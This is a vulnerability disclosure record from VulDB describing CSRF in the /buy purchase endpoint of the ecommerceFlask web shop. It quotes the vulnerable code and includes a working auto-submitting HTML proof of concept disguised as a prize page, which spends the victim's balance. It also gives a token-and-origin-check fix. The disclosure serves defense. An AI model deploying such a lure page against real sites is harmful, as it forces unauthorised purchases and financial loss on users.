Submit #850853: imhamzaazam ecommerceFlask v1.0 CSRF

Title: imhamzaazam ecommerceFlask v1.0 CSRF
Description:

# CSRF Vulnerability in Forced Purchase (/buy)

## Summary

A **Cross-Site Request Forgery (CSRF)** vulnerability exists in the purchase endpoint `/buy`. The lack of CSRF protection in both the application configuration and the endpoint implementation allows an attacker to force an authenticated victim to purchase a product, deducting the victim's account balance and creating an order without authorization.

## Vulnerability Details

### Configuration-Level Issue

**File**: `application.py` (Lines 24-31)

```python
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# ❌ No CSRF protection mechanism configured (no Flask-WTF / CSRFProtect)
# ❌ No SESSION_COOKIE_SAMESITE configured on the session cookie

db = SQL("sqlite:///ecommDb.db")
```

Authentication relies solely on the session cookie via `helpers.py`:

```python
def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if session.get("user_id") is None:  # ❌ cookie-only authorization
            return redirect("/login")
        return f(*args, **kwargs)
    return decorated_function
```

### Endpoint-Level Code Analysis

**File**: `application.py` (Lines 48-72)

```python
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
    if request.method == "POST":
        product = request.form.get("product")
        rows = db.execute("Select * from products where product_name= :name", name=product)
        quantity = int(request.form.get("quantity"))
        # ❌ No CSRF token validation
        # ❌ No Origin/Referer verification
        db.execute("Update users set cash = cash - :bought where id = :id",
                   bought=rows[0]["product_price"], id=session["user_id"])  # ⚠️ deducts balance
        db.execute("insert into invoice(...) values (...)")  # ⚠️ creates order
        db.execute("Update products set product_stock = product_stock - :count where product_name=:name",
                   name=product, count=quantity)
        return redirect(url_for("index"))
```

**Security Issues**:

1. ❌ No CSRF token validation
2. ❌ No origin verification
3. ⚠️ Performs a financial state change (balance deduction + order creation) based only on the session cookie

## Proof of Concept (PoC)

```html
<!DOCTYPE html>
<html>
<head>
  <title>You won a prize!</title>
</head>
<body>
  <h2>Congratulations! Claim your reward</h2>
  <p>Loading your reward...</p>
  <form id="csrf-form" action="http://127.0.0.1:5000/buy" method="POST">
    <input type="hidden" name="product" value="EXISTING_PRODUCT_NAME">
    <input type="hidden" name="quantity" value="1">
  </form>
  <script>
    setTimeout(function() {
      document.getElementById('csrf-form').submit();
    }, 1000);
  </script>
</body>
</html>
```

**Verified result** (local deployment): a cross-site, tokenless `/buy` request was accepted (HTTP 302) and the victim's balance dropped from `10000.0` to `9900.0`.

## Impact

**Victim balance theft / forced purchase** - An attacker can force an authenticated user to spend their balance on an arbitrary (attacker-defined) product, causing direct financial loss and fraudulent orders.

---

**CVSS Score**: 6.5 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
**CWE**: CWE-352 (Cross-Site Request Forgery)

---

**Reported by**: flashzyc
**Date**: 2026-06-07
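The two checks the report flags as missing (CSRF token validation and Origin/Referer verification), as an added example written here and not code from the report or the ecommerceFlask project: a per-session synchronizer token plus an origin check, kept as plain functions so they can be called from a Flask `before_request` hook without a framework dependency. `ALLOWED_ORIGIN`, the dict-based session stand-in and the sample request headers are constructed assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption (constructed): the origin the shop is served from; the report's PoC posts to 127.0.0.1:5000.
ALLOWED_ORIGIN = "http://127.0.0.1:5000"


def issue_csrf_token(session):
    """Create (once per session) the synchronizer token to embed as a hidden field in the /buy form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def origin_allowed(headers):
    """True only if Origin (or Referer as fallback) names this site; an absent header is treated as untrusted."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == ALLOWED_ORIGIN


def csrf_check(session, form, headers):
    """Gate for state-changing POSTs: return None to allow, or the reason the request is blocked."""
    if not origin_allowed(headers):
        return "bad origin"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison; a session that never issued a token can never pass.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "missing or invalid csrf token"
    return None


def demo():
    """Run the report's cross-site PoC shape through the gate, then a legitimate same-site submission."""
    session = {"user_id": 1}  # constructed stand-in for Flask's server-side session
    token = issue_csrf_token(session)
    purchase = {"product": "EXISTING_PRODUCT_NAME", "quantity": "1"}
    # Constructed: the PoC form is submitted from a different origin and carries no token.
    forged = csrf_check(session, dict(purchase), {"Origin": "https://attacker.example"})
    # Constructed: the app's own form includes the hidden csrf_token field.
    genuine = csrf_check(session, {**purchase, "csrf_token": token}, {"Origin": ALLOWED_ORIGIN})
    return forged, genuine  # ("bad origin", None)
```

In the application this would run from an `@app.before_request` hook for `POST` requests (abort with 403 on a non-`None` result) alongside `app.config["SESSION_COOKIE_SAMESITE"] = "Lax"` for defence in depth.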
Source: https://github.com/imhamzaazam/ecommerceFlask/issues/1
User: flashzyc (UID 92850)
Submission: 06/07/2026 08:11 (29 days ago)
Moderation: 07/05/2026 20:36 (29 days later)
Status: Accepted
VulDB entry: 376394 [imhamzaazam ecommerceFlask up to cb7d9e24c30a99379651b7493b32048126ef402b cross-site request forgery]
Points: 20
